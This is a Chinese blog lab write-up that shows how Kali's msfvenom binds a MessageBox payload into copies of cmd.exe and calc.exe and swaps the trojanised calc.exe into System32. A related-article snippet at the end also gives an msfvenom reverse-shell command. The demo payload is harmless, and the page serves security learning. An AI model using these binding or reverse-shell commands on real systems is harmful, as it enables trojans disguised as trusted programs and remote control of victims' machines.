使用msfvenom将打开messagebox的木马程序附加在正常程序上

最新推荐文章于 2023-02-19 02:30:34 发布
最新推荐文章于 2023-02-19 02:30:34 发布
阅读量643 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: 渗透测试 msfvenom 木马 kali kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WZZ_2363173126/article/details/120050783
版权

文章目录

实验内容

       使用Kali的msfvenom工具将一个打开messsagebox的木马程序附加在目标主机(Windows 7 Professional x64)的系统程序上。

实验过程

msfvenom参数

    需要使用到的msfvenom参数如下:

  • -p <payload>:设置使用的payload。
  • -f <format>:设置输出格式。
  • -a <arch>:设置payload使用的架构。
  • --platform <platform>:设置payload使用的平台。
  • -o <path>:将payload保存到指定的文件路径。
  • -x <path>:使用一个可执行文件当作模板。
  • -k:保留模板文件的功能,将payload作为线程注入。

查找messsagebox相关payload

    使用如下命令查找messsagebox相关payload:

msfvenom -l payload |grep messagebox

    查找到的与messsagebox相关的payload如下:
查找messsagebox相关payload

# windows/messagebox                             Spawns a dialog via MessageBox using a customi
# windows/x64/messagebox                         Spawn a dialog via MessageBox using a customiz

    目标操作系统为64位,故选择 windows/x64/messagebox

查看payload参数

    使用如下命令查看payload参数:

msfvenom -p windows/x64/messagebox --list-options

    payload参数如下:

Options for payload/windows/x64/messagebox:
=========================

       Name: Windows MessageBox x64
     Module: payload/windows/x64/messagebox
   Platform: Windows
       Arch: x64
Needs Admin: No
 Total size: 295
       Rank: Normal

Provided by:
    pasta <jaguinaga@infobytesec.com>

Basic options:
Name      Current Setting   Required  Description
----      ---------------   --------  -----------
EXITFUNC  process           yes       Exit technique (Accepted: '', seh, thread, process, none)
ICON      NO                yes       Icon type (Accepted: NO, ERROR, INFORMATION, WARNING, QUESTION)
TEXT      Hello, from MSF!  yes       Messagebox Text
TITLE     MessageBox        yes       Messagebox Title

Description:
  Spawn a dialog via MessageBox using a customizable title, text & 
  icon

Advanced options for payload/windows/x64/messagebox:
=========================

    Name                Current Setting  Required  Description
    ----                ---------------  --------  -----------
    PrependMigrate      false            yes       Spawns and runs shellcode in new process
    PrependMigrateProc                   no        Process to spawn and run shellcode in
    VERBOSE             false            no        Enable detailed status messages
    WORKSPACE                            no        Specify the workspace for this module

Evasion options for payload/windows/x64/messagebox:
=========================

    Name  Current Setting  Required  Description
    ----  ---------------  --------  -----------

    可以看到payload的arch为x64,platform为windows,payload的参数TEXT为"Hello, from MSF! "。

将打开messagebox的木马程序附加在正常程序上

将打开messagebox的木马程序附加在cmd程序上

       使用以下命令使用msfvenom将打开messagebox的木马程序附加在cmd程序上:

msfvenom -a x64 --platform windows -p windows/x64/messagebox TEXT="Your PC has been hacked!" -x cmd_win7.exe -k -f exe -o cmd_win7_hacked.exe

使用msfvenom将打开messagebox的木马程序附加在cmd程序上
       将cmd_win7_hacked.exe程序拷贝到win7下运行:
使用msfvenom将打开messagebox的木马程序附加在cmd程序上

将打开messagebox的木马程序附加在计算器程序上

       使用以下命令使用msfvenom将打开messagebox的木马程序附加在计算器calc程序上:

msfvenom -a x64 --platform windows -p windows/x64/messagebox TEXT="Your PC has been hacked!" -x calc_win7.exe -k -f exe -o calc_win7_hacked.exe

使用msfvenom将打开messagebox的木马程序附加在计算器程序上
       calc.exe只能在C:/Windows/System32/下运行,并且文件名不能变。将calc_win7_hacked.exe程序拷贝到win7下目录C:/Windows/System32/下修改名字为calc.exe,然后运行:
calc

Dennis F
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSFvenom基础
子曰小玖的博客
05-16 1886
https://www.offensive-security.com/metasploit-unleashed/msfvenom/ https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom kali自带的生成木马工具----Msfvenom Msfvenom是有效负载生成和编码的组合。它于2015年6月8日...
[Kali]--Msfvenom
wwxxee
11-06 898
Msfvenom 参数 MsfVenom - a Metasploit standalone payload generator. Also a replacement for msfpayload and msfencode. Usage: /usr/bin/msfvenom [options] <var=val> Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe -o payload.ex
msf MessageBox后渗透模块编写
Cosmopolitan的博客
03-08 682
message_box.rb ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule &lt; Msf::Post includ...
metasploit---msfvenom
孤的博客
11-21 1497
kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenommsfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以...
msfvenom & shellter——程序捆绑木马_端口映射远程控制
Ho1aAs‘s Blog
07-29 3740
文章目录一、工具&环境二、准备三、木马程序捆绑Ⅰ、msfvenom捆绑Ⅱ、shellter捆绑四、msfconsole监听完 免责声明:本文章仅供网络安全方面学习、交流使用,任何操作与作者无关 请遵守我国法律法规 一、工具&环境 VMware V15.5 Kali-Linux-2020.2 msfconsole msfvenom shellter 花生壳 远程计算器 二、准备 端口映射 使用花生壳将Kali的内网IP映射,端口号为默认4444 在CMD中Ping一下域名得到IP
网络安全-木马入侵windows -msfvenom反弹shell(CMD)
weixin_48137911的博客
02-19 5677
需要做什么呢漏洞与木马的区别在于漏洞是某个系统某个框架,才能用特定的环境下才可以但是木马是全部机器都可以用因为木马相当于软件如果你电脑不能安装软件那你这个电脑也没啥用。
在C#程序中对MessageBox进行定位的方法
01-20
在 C# 中没有提供方法用来对 MessageBox 进行定位,但是通过 C++ 你可以查找窗口并移动它们,本文讲述如何在 C# 中对 MessageBox 进行定位。 首先需在代码上引入所需名字空间:   using System.Runtime....
HOOKAPI(二)——HOOK自己程序MessageBox
02-26
需要注意的是,本例子的HOOK仅仅对自己实现的MFC窗口程序,当开始HOOK后,自己的程序调用MessageBox将被重定向,但其他程序滴啊用MessageBox时是正常的。在Windows中,每个进程都有自己的进程控制块,有自己的安全...
C#Messagebox功能描述的案例程序
03-30
C#中MessageBox常见的功能介绍
HOOKAPI(三)——HOOK所有程序MessageBox
02-26
本实例要实现HOOKMessageBox,包括MessageBoxA和MessageBoxW,其实现细节与HOOKAPI(二)中介绍的基本类似,唯一不同的是,本实例要实现对所有程序的HOOKMessageBox,即无论系统中哪一个程序调用MessageBox都会被...
msfvenom的简单使用
jeff_true的博客
01-14 619
1,msfvenom -l | grep windows | grep x64 | grep tcp 2,msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.19.91.10 LPORT=4444 -f exe > shell.exe 将此exe文件传到目标靶机上(windows x64) 3,msfconsole use exploit/...
关于消息提示框(MessageBox)引起的一个奇怪的错误
白永辉的专栏
02-22 2581
原先以为消息提示框(MessageBox)就是弹出一个通知而已,对程序并没有什么影响。结果因为这个观点,程序调了好久... 代码如下: case LOGOK: { this.DialogResult = DialogResult.OK; MessageBox.Show(msgArgs.message); break; }即,在登录成功之后,会弹出一
msfvenom生成payload
hackerie的博客
03-08 649
最近看到了一个非常不错的个人博客,布局简洁、大方、美观,非常让人赏心悦目。推荐给大家: msfvenom生成payload https://ssooking.github.io/msfvenom-sheng-cheng-payload/ ...
msfvenom 生成shellcode
nethm的专栏
09-20 7599
先来看下msfvenomd的帮助 root@localhost:~# msfvenom -h Error: MsfVenom - a Metasploit standalone payload generator. Also a replacement for msfpayload and msfencode. Usage: /usr/bin/msfvenom [options] O
cmd命令行四种弹窗命令
迷逝
12-26 9624
cmd命令行四种弹窗命令 mshta vbscript:msgbox("到点了!快去踮脚!!",64,"提示")(window.close) msg %username% /time:10 "要显示的内容" mshta vbscript:msgbox("要显示的内容",64,"要显示的标题")(window.close) mshta vbscript:CreateObject("Wscript.Shell").popup("要显示的内容",7,"要显示的标题",64)(window.close) m
c#实现messsagebox对话框的弹出和对话框选择的操作
qq_33543749的博客
12-13 1783
//实现messsagebox对话框的弹出和对话框选择的操作         private void 删除全部ToolStripMenuItem_Click(object sender, EventArgs e)         {             //string str=string.Format("Are you sure to delete all files in {0}
Windows API 编程——第一例:MessageBox()
衣带渐宽人憔悴
09-20 928
#include &lt;Windows.h&gt; #pragma comment(lib,"User32.lib") int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { MessageBox(NULL, TEXT("开始学习Windows编程"),...
MessageBox调用--Shellcode
Xor0ne
02-18 1666
C语言MessageBox()函数简单调用: MessageBox()函数拓展: MessageBoxA函数是Windows系统提供的API函数,需要引入user32.lib这个库,同时还需要手动声明一下函数原型。MessageBoxA函数中最后一个参数为对话框风格,通过设置这个参数不同值,可以实现显示MessageBoxA的不同组态。具体参数含义可以参考微软官方手册。链接地址:https:/...
在cmd命令行中弹出Windows对话框
weixin_34174422的博客
09-05 6882
有时候用bat写一些小脚本最后会弹出对话框提示操作成功,可以用mshta.exe来实现,它是Windows系统的相关程序,用来执行.HTA文件,一般计算机上面都有这个程序,实现如下: mshta vbscript:msgbox("我是提示内容",64,"我是提示标题")(window.close)   如果没有mshta这个程序的话,那么就临时产生一个vbs脚本来实现,完了再删除这个脚本就行了...
在winform程序使用opencvsharp打开摄像头,并实时显示视频
最新发布
04-01
以下是使用OpenCvSharp在WinForm程序打开摄像头并实时显示视频的代码: 1. 添加引用 首先,需要添加对OpenCvSharp的引用。可以通过NuGet包管理器来添加。 2. 创建WinForm 在WinForm中添加一个PictureBox控件,用于显示摄像头的视频流。 3. 编写代码 在WinForm的Load事件中编写代码,打开摄像头并实时显示视频流。 ```csharp private VideoCapture _capture; private Mat _frame; private void Form1_Load(object sender, EventArgs e) { _capture = new VideoCapture(0); _capture.Open(0); if (!_capture.IsOpened()) { MessageBox.Show("无法打开摄像头!"); return; } _frame = new Mat(); Timer timer = new Timer(); timer.Interval = 33; // 每33毫秒刷新一次 timer.Tick += new EventHandler(Timer_Tick); timer.Start(); } private void Timer_Tick(object sender, EventArgs e) { _capture.Read(_frame); if (!_frame.Empty()) { pictureBox1.Image = BitmapConverter.ToBitmap(_frame); } } ``` 在上面的代码中,创建了一个VideoCapture对象,用于打开摄像头。然后检查是否成功打开摄像头,如果无法打开,则弹出消息框并返回。接着创建一个Mat对象,用于存储每一帧视频流。最后,使用Timer定时器来定时读取每一帧视频流,并将其转换为Bitmap对象,然后显示在PictureBox控件中。 需要注意的是,由于WinForm是单线程运行的,因此需要定时器来定时更新PictureBox控件的显示。否则,程序会卡死。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值